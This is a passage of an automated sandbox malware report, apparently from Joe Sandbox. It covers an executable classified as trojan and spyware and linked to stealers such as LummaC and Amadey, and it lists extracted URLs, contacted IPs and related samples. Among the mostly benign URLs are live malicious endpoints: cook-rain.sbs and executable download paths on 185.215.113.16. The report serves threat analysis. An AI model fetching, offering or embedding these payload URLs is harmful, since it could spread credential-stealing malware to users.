                                          • Avira URL Cloud: malware
                                          unknown
                                          https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_102.6.drfalse
                                            high
                                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.file.exe, 00000000.00000003.1817114587.0000000000DC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://www.linkedin.com/cws/share?url=$chromecache_94.6.dr, chromecache_84.6.drfalse
                                                high
                                                https://cook-rain.sbs/apirvicefile.exe, 00000000.00000003.1812472132.0000000000DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://cook-rain.sbs/9file.exe, 00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1838507084.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000000.00000003.1763950622.00000000054E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763866433.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/Youssef1313chromecache_102.6.drfalse
                                                      high
                                                      https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_94.6.dr, chromecache_84.6.drfalse
                                                        high
                                                        https://aka.ms/msignite_docs_bannerchromecache_94.6.dr, chromecache_84.6.drfalse
                                                          high
                                                          https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_84.6.drfalse
                                                            high
                                                            http://polymer.github.io/AUTHORS.txtchromecache_94.6.dr, chromecache_84.6.drfalse
                                                              high
                                                              https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_102.6.drfalse
                                                                high
                                                                http://185.215.113.16/off/def.exemXfile.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_94.6.dr, chromecache_84.6.drfalse
                                                                  high
                                                                  http://185.215.113.16/off/def.exeqXfile.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: phishing
                                                                  unknown
                                                                  https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_102.6.drfalse
                                                                    high
                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.1817114587.0000000000DC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.c.lencr.org/0file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.i.lencr.org/0file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://aka.ms/pshelpmechoosechromecache_94.6.dr, chromecache_84.6.drfalse
                                                                            high
                                                                            https://aka.ms/feedback/report?space=61chromecache_102.6.dr, chromecache_103.6.drfalse
                                                                              high
                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installfile.exe, 00000000.00000003.1763950622.00000000054C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://learn-video.azurefd.net/vod/playerchromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                    high
                                                                                    https://twitter.com/intent/tweet?original_referer=$chromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                      high
                                                                                      https://github.com/gewarrenchromecache_102.6.drfalse
                                                                                        high
                                                                                        https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1816518420.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://polymer.github.io/CONTRIBUTORS.txtchromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                            high
                                                                                            https://cook-rain.sbs/apivaluefile.exe, 00000000.00000003.1788518353.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1788475696.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://cook-rain.sbs/apiufile.exe, 00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1838507084.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_102.6.drfalse
                                                                                              high
                                                                                              https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_102.6.drfalse
                                                                                                high
                                                                                                https://client-api.arkoselabs.com/v2/api.jschromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                                  high
                                                                                                  https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                                    high
                                                                                                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgfile.exe, 00000000.00000003.1817114587.0000000000DC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                                        high
                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://github.com/Thrakachromecache_102.6.drfalse
                                                                                                            high
                                                                                                            http://polymer.github.io/PATENTS.txtchromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                                              high
                                                                                                              https://aka.ms/certhelpchromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                                                high
                                                                                                                http://185.215.113.16/steam/random.exefile.exe, file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://cook-rain.sbs/file.exe, 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1788475696.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://github.com/mairawchromecache_102.6.drfalse
                                                                                                                          high
                                                                                                                          http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000000.00000003.1763950622.00000000054E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763866433.00000000054EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://schema.orgchromecache_84.6.drfalse
                                                                                                                                high
                                                                                                                                http://polymer.github.io/LICENSE.txtchromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1816518420.00000000055BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://aka.ms/yourcaliforniaprivacychoiceschromecache_102.6.drfalse
                                                                                                                                        high
                                                                                                                                        https://cook-rain.sbs/ofile.exe, 00000000.00000003.1788518353.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1788475696.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        unknown
                                                                                                                                        https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://cook-rain.sbs/.file.exe, 00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1838507084.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          unknown
                                                                                                                                          https://github.com/nschonnichromecache_102.6.drfalse
                                                                                                                                            high
                                                                                                                                            http://185.215.113.16/file.exe, file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://185.215.113.16/jrfile.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                              unknown
                                                                                                                                              https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/adegeochromecache_102.6.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://cook-rain.sbs/tPfile.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://cook-rain.sbs/%file.exe, 00000000.00000003.1788518353.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1788475696.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://support.microsoffile.exe, 00000000.00000003.1763866433.00000000054EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://github.com/jonschlinkert/is-plain-objectchromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://octokit.github.io/rest.js/#throttlingchromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://cook-rain.sbs/apidfile.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          https://github.com/js-cookie/js-cookiechromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                                                                                            high
                                                                                                                                                            http://185.215.113.16/off/def.exefile.exe, file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schema.org/Organizationchromecache_102.6.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesfile.exe, 00000000.00000003.1763950622.00000000054C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://channel9.msdn.com/chromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://github.com/dotnet/trychromecache_94.6.dr, chromecache_84.6.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://185.215.113.16/Erfile.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: phishing
                                                                                                                                                                        unknown
                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        13.107.246.63
                                                                                                                                                                        s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                        185.215.113.16
                                                                                                                                                                        unknownPortugal
                                                                                                                                                                        206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                        104.21.66.38
                                                                                                                                                                        cook-rain.sbsUnited States
                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                        239.255.255.250
                                                                                                                                                                        unknownReserved
                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                        216.58.208.228
                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                        IP
                                                                                                                                                                        192.168.2.7
                                                                                                                                                                        192.168.2.4
                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                        Analysis ID:1559711
                                                                                                                                                                        Start date and time:2024-11-20 21:03:05 +01:00
                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 6m 30s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                        Number of analysed new started processes analysed:10
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Sample name:file.exe
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@24/61@7/7
                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                        • Number of non-executed functions: 1
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 2.16.230.26, 172.217.19.227, 172.217.19.238, 74.125.205.84, 2.20.41.214, 34.104.35.123, 142.250.181.138, 172.217.17.74, 142.250.181.42, 172.217.19.234, 142.250.181.74, 172.217.17.42, 172.217.19.202, 172.217.19.170, 142.250.181.106, 172.217.21.42, 2.21.72.71, 2.21.72.73, 172.217.17.67
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, clients.l.google.com, wcpstatic.microsoft.com
                                                                                                                                                                        • Execution Graph export aborted for target file.exe, PID 6860 because there are no executed function
                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                        • VT rate limit hit for: file.exe
                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                        15:04:04API Interceptor54x Sleep call for process: file.exe modified
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        13.107.246.63Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                          Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              https://safelinks.mygo1.com/ls/click?upn=u001.1mDt7ytPYCJSVG-2BhF04Stdj4cHPTtKuY-2FmURzzu8QTldxw-2FzpyQYTJMxn3CPFnnsIuOY-2F5ruiOS6FLjm58JljkOmonXKnT8iwwYmA30I9bsERP5vx05gL85c3Lc-2F9WrpUfyNz12kcqjd3wt6WtaxLWxoHc5J3Zua9xQUurCc2AIjJtnP8Xu6Otzn8DBWsS0QPl2WC-2FCyrpDHulFvP0eEWn9IDo-2BqFc1GmD1SsVw5lRKY6yWeuyFQhUWIqZ4VCAeEroA6Ndqh9iaNvFz0XzERrEFYNTxkPirSQWkw6YqX5uo-3DaVWv_h5yw3DykLZfOpXzx776oAcLdVv6tuK-2FE7nfoR01CbnMOUH4fGhxn3KVtBew-2BRfJoKGgpvyhjBTXBTw1J6hN0wi-2FkZpowy1W9-2BTe-2Bf57Ts50FCXINRnefXkQ-2FFO3hKPeSa4hJKnd-2Bpj-2F7GS6r3Uq0ucRRb6izhExkinWfndIosIP-2Ff06hq3eO6ged-2F-2FYA1ldX-2BK4wuZipA-2BXRgTIkXvTbKj74iEMllOxCNkgoQZE3mKkIMM6o0L-2FNgq5TR8KcWZzS-2BEoZ1Oyop5AmC8zRE1SSKfnZ-2F0g1qg2dir-2F788Fq8CtpqmRpkFaF34nQcSYSfbixDSj0B5gj0fuY43UiPKR2D9s0w8lZaDR5dDYOswzPttauCIiIjiyfK20I-2BA4JjKFgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      https://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            185.215.113.16HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                                                                                                                                            • 185.215.113.16/clip/random.exe
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                            • 185.215.113.16/mine/random.exe
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                            • 185.215.113.16/mine/random.exe
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                            • 185.215.113.16/off/def.exe
                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                            • 185.215.113.16/mine/random.exe
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            cook-rain.sbsfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                            • 104.21.66.38
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                            s-part-0035.t-0009.t-msedge.netFax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            Y7Zv23yKfb.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            PNSBt.jsGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            zc4x7OQkYB.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            zc4x7OQkYB.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            IYakRFbGtx.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            CTK5arUcE1.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            0xkvdHKQpt.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            CLOUDFLARENETUShttps://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.htmlGet hashmaliciousGabagoolBrowse
                                                                                                                                                                                            • 104.17.25.14
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 172.67.206.172
                                                                                                                                                                                            PNSBt.jsGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                            • 172.67.187.200
                                                                                                                                                                                            LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                                                                                                            • 172.67.187.200
                                                                                                                                                                                            YyA4O1TBSW.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.21.93.38
                                                                                                                                                                                            zlibwapi.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.204.56
                                                                                                                                                                                            YyA4O1TBSW.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.21.93.38
                                                                                                                                                                                            zlibwapi.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 172.67.204.56
                                                                                                                                                                                            plutonium.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 104.21.235.11
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 172.67.155.248
                                                                                                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUSFax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 52.146.76.30
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            https://ambir.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                            • 13.107.42.14
                                                                                                                                                                                            https://safelinks.mygo1.com/ls/click?upn=u001.1mDt7ytPYCJSVG-2BhF04Stdj4cHPTtKuY-2FmURzzu8QTldxw-2FzpyQYTJMxn3CPFnnsIuOY-2F5ruiOS6FLjm58JljkOmonXKnT8iwwYmA30I9bsERP5vx05gL85c3Lc-2F9WrpUfyNz12kcqjd3wt6WtaxLWxoHc5J3Zua9xQUurCc2AIjJtnP8Xu6Otzn8DBWsS0QPl2WC-2FCyrpDHulFvP0eEWn9IDo-2BqFc1GmD1SsVw5lRKY6yWeuyFQhUWIqZ4VCAeEroA6Ndqh9iaNvFz0XzERrEFYNTxkPirSQWkw6YqX5uo-3DaVWv_h5yw3DykLZfOpXzx776oAcLdVv6tuK-2FE7nfoR01CbnMOUH4fGhxn3KVtBew-2BRfJoKGgpvyhjBTXBTw1J6hN0wi-2FkZpowy1W9-2BTe-2Bf57Ts50FCXINRnefXkQ-2FFO3hKPeSa4hJKnd-2Bpj-2F7GS6r3Uq0ucRRb6izhExkinWfndIosIP-2Ff06hq3eO6ged-2F-2FYA1ldX-2BK4wuZipA-2BXRgTIkXvTbKj74iEMllOxCNkgoQZE3mKkIMM6o0L-2FNgq5TR8KcWZzS-2BEoZ1Oyop5AmC8zRE1SSKfnZ-2F0g1qg2dir-2F788Fq8CtpqmRpkFaF34nQcSYSfbixDSj0B5gj0fuY43UiPKR2D9s0w8lZaDR5dDYOswzPttauCIiIjiyfK20I-2BA4JjKFgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                            • 13.69.116.107
                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            • 13.107.246.63
                                                                                                                                                                                            x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 40.123.105.159
                                                                                                                                                                                            i486.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 20.198.14.134
